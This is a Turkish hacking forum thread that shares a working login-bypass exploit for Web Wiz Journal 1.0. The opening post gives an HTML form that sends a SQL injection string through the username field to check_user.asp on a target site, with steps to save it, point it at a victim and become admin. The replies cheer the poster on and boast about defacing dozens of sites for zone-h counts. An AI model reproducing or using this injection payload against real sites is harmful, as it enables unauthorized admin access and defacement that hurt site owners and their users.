Sürekli Php olmaz Birazda Asp Hackleyek

blackwolf

uid=0(root)
Reaction score
0
GüzeL :d

eLine SaĞLiq :D

Web Wiz Journal version 1.0 açığı..

Kod:
<html>
<form method="POST" action="http://hedefsite.com/dosya yolu/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

notepade kodları yapı$tırın, hedefsite.com we dosya yolunu deği$tirip farkLı kaydet diyerek isim.html olarak kayıt edin . we sonra açın submit butonuna basın.Artık adminsiniz..

eeeeee açığı biliosan hacklicen yoq su hacklesin die bırakcammı bide:)

sana verdiğim yer halen duruyor ama .....

vay vay vay kankama bak +10

karakutu ortak olm yoksun göremiom nette geldi gene bana güsel açöıklar nerdesin sen bu açıkla arkadaslar bosuna site aramayın varsa 5 6 tane kalmıstır geri kalanını indirdim ben zaten benden önce dark_mare ustat indirmişti yarısını orti msne gelde senle bi party yapalım buğün zone-h de 91 sitede kaldım 100 yapmam lazım uğrasımaıomda tek basıma aslı bitirdi beni hem ona yaz hem hac olmuor yani anlıcan bizde ASLI İN HACK OUT olduı :)

güzel başa rılar senin gibi ler bu alemdeki siteleri bitiremez:D
unutma ..

rahat ol bitti bile istersen gitr hacklersin ama zone-h alınmsı olur :=)

yaw yaw yapamıom ben kendi admıma konusam dark.-mare adına konusmak yanlıs olur ben senin indexi beğendim aldım koydum kötümü yani bunda ne var anlamıorum zaten biride paso bu index yüzünnde küfredior bana kendini beğenmiş biri ismi bende kalsın bence guru duyulacak bişi senin indexini kullannıoz yani beğenilmiş bunu bizde bu sekil belirtmek istoz:) Tabi İstemiosan Söle Bidaha Kullanmam Asla

güzel iş çıkarmışsın ;9

Geri